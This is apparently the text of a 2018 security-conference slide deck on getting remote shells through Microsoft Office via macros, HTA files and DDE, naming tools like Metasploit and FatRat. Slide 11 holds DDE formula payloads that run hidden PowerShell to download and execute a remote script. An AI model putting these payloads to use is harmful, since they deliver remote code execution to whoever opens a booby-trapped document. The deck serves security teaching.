The document discusses different methods for getting remote access to systems through Microsoft Office applications, including macros, HTML Applications (HTA), and Dynamic Data Exchange (DDE). Macros can contain malicious scripts that execute when enabled. HTA files use HTML, scripts, and ActiveX to run malicious payloads. DDE sends messages and shares data between applications in real-time, which can be abused. Tools like Kali Linux, Metasploit, Empire, and FatRat can generate payloads that exploit these Office features to retrieve remote shells. The presentation demonstrates these techniques and stresses the importance of security best practices like antivirus and strong, unique passwords.

1. GETTING A SHELL THROUGH
MS OFFICE
Velayutham Selvaraj , Msc Digital Forensics & Cyber Crime Analysis
CYBER PHOENIX CONCLAVE 2K18INFORMATION SECURITY CONFERENCE
1

2. $ ECHO BRAG
CEO of TwinTech Solutions Pvt Ltd
Co-Founder Of Talented Pentesters Hut
Certified CEH ECSA LPT CHFI etc List goes on
Trained 1000’s of Individuals working in Top Mnc like Infosys, TCS etc
FreeLancer
Techincal Author at GB Hackers
Cyber Forensic Researcher
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
2

3. MACROS HTA DDE
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
3

4. MACROS
• Microsoft Office documents — Word,
Excel, PowerPoint, and other types of
documents — can contain embedded
code written in a programming language
known as Visual Basic for Applications
• Macros can be embedded with malicious
scripts to execute once enabled
• Still Widely used and some of the more
prominent threats at the time ran forms of
malware such as DRIDEX, ROVNIX and
VAWTRA
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
4

5. ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
5

6. HTA
• An HTML Application (HTA) is a Microsoft Windows
program whose source code consists of HTML,
Dynamic HTML, and one or more scripting
languages CVE-2017-0199 HTA Handler Vulnerability
• OLE (Object Linking and Embedding) is Microsoft's
framework for a compound document technology.
• Briefly, a compound document is something like a
display desktop that can contain visual and
information objects of all kinds: text, calendars,
animations, sound, motion video, 3-D, continually
updated news, controls, and so forth.
• Part of Microsoft's ActiveX technologies, OLE takes
advantage and is part of a larger, more general
concept, the Component Object Model (COM) and
its distributed version, DCOM.
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
6

7. ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
7

8. DDE
Dynamic Data Exchange sends messages between applications that share data
and uses shared memory to exchange data between applications.
Applications can use the DDE protocol for one-time data transfers and for
continuous exchanges in which applications send updates to one another as
new data becomes available.
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
8

9. REAL TIME USES
Linking to real-time data,
such as to stock market
updates, Inventory
management , or process
control.
01
Creating compound
documents, such as a word
processing document that
includes a chart produced
by a graphics application.
02
Using DDE, the chart will
change when the source
data is changed, while the
rest of the document
remains the same.
03
Performing data queries
between applications, such
as a spreadsheet querying a
database for accounts past
due.
04
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
9

10. TOOLS REQUIRED
KALI LINUX OR METASPLOIT OR EMPIRE
FATRAT
MICROSOFT OFFICE (ANY VERSION)
MICROSOFT WINDOWS
BASIC KNOWLEDGE ABOUT NETWORKING AND PORTFORWARDING
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
10

11. UNDERSTAND THE CODE
• =cmd|'/c calc.exe'!_xlbgnm.A1
• =cmd|'/c powershell.exe -w hidden $e=(New-Object
System.Net.WebClient).DownloadString("http://192.168.0.8/cyberconclave.ps1");IE
X $e'!_xlbgnm.A1
• =MSEXCEL|'......WindowsSystem32cmd.exe /c powershell.exe -nop -w 1
$e=(New-Object
System.Net.WebClient).DownloadString("http://192.168.0.8/hello.ps1"); IEX
$e'!_xlbgnm.A1
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
11

12. ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
12

13. DEMO TIME
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
13

14. ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
14

15. HOW TO BE
SAFE
Buy a good antivirus,
you never leave your
door open.
Do the same for your
computers, laptops &
smart phones
Never keep the same
passwords
Change your
passwords regularly
Use lastpass to store
your passwords
Use veracrypt to
encrypt sensitive
information
There is no 100%
Security nor 100%
Anonymity
Last but not least is
common sense
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
15

16. THANK YOU
LETS MAKE A
RESPONSIBLE AND SAFE
CYBER WORLD
1
HEED TO ADVICES OF
YOUR FELLOW MEN
2
RESPECT EVERYONE AND
SPREAD LOVE WITHIN
THE COMMUNITY
3
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
16

17. FEEL FREE TO CONTACT ME
ANYTIME
• VELAYUTHAM@TWINTECHSOLUTIONS.IN
• FB.COM/LAWWAY09
• 9677034266
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
17

18. SOURCED FROM
• http://searchwindowsserver.techtarget.com/definition/OLE-Object-Linking-and-
Embedding
• https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-
vulnerability/
• https://msdn.microsoft.com/en-
us/library/windows/desktop/ms648774(v=vs.85).aspx
• https://www.harmj0y.net/blog/empyre/os-x-office-macros-with-empyre/
• https://github.com/Screetsec/TheFatRat
• https://www.kali.org/downloads/
ALL THE CONTENTS ARE SOURCED AND BELONG TO RESPECTIVE AUTHORS
18